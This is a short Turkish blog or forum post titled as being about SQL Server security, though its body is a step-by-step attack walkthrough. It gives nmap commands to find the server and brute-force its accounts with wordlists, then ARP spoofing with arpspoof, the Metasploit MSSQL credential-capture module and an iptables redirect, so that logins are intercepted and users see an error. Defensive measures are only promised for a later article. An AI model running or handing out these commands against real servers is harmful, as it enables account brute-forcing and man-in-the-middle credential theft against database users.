Kayıt Ol

Giriş


Şifremi Kaybettim

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

soru ekleme

You must login to ask question.

Giriş


Kayıt Ol

Merhaba, kayıt formu üzerinden kayıt olabilirsiniz. Fakat sosyal medya ile kayıt olmanızı önermekteyiz.

Sql Server’da Güvenlik

Sql Server’da Güvenlik

Sql Server’da Güvenlik

 

Microsoft SQL Server 1433 numaralı port üzerinden çalışır. Bazı yazılımcılar farklı portlar kullanabilirler. Eğer diğer portları bulmak istiyorsanız NMAP‘i(Güvenlik tarayıcısı) kullanabilirsiniz. Örnek verecek olursak;


$ nmap -n <“IP”> -p “PORT” (Bu kod ile port üzerindeki server hakkında bilgi alınabilir)

$ nmap -p “PORT” –script ms-sql-info <“IP”> (Detaylı Bilgi Almak için kullanılır)

$ nmap -p <PORT> –script ms-sql-brute –script-args mssql.instance-all,userdb=wordlist.txt,passdb=wordlist.txt <“IP”>  (Ip’deki server’a ait account bilgilerine sahipr olmak gerekmektedir bu şekilde user ve password’e ulaşılabilinir.)

$ echo 1 > /proc/sys/net/ipv4/ip_forward (Ip Yönlendirmesi yapıyoruz, Kali Linux işletim sisteminde bulunan “arpspoof” ile hedef ve sunucu arasına girilmiş oldu. )

 Sırası ile yapınız



$ arpspoof -i eth0 -t <SQL SERVER IP> <“Kurban IP”>

$ arpspoof -i eth0 -t <“Saldırı Yapılacak IP”> <“Saldırı Yapılacak IP”>

$ use auxiliary/server/capture/mssql

$ set SRVPORT “PORT”

$ iptables -t nat -A PREROUTING -p tcp -d 192.168.48.130 –dport “PORT” -j REDIRECT –to-ports “PORT” (Saldırılan hesap bilgilerini girdiğinde yazılım hesap bilgilerini yakalayıp bize verecek ve saldırdığımız Server’a kullanıcı giriş yapmak istediğinde Additional Information hatası alacak )


Diğer makalemde size daha detaylı DB Saldırılarını bunun önüne nasıl geçebileceğinizi ve database’inizi nasıl koruyacağınızı anlatacağım Esen kalın.

 

 

Hakkında Cem GÖKSUÇırak

Bilgisayar Programcılığı mezunuyum bir yazılım şirketinde çalışmakta olup aktif olarak MVC üzerinde proje geliştiriiyorum. Sistem güvenliği ve Python konusunda da yarı profesyonel olarak çalışmaktayım.

Bir Cevap Yaz

Captcha Captcha güncellemek için resime tıkla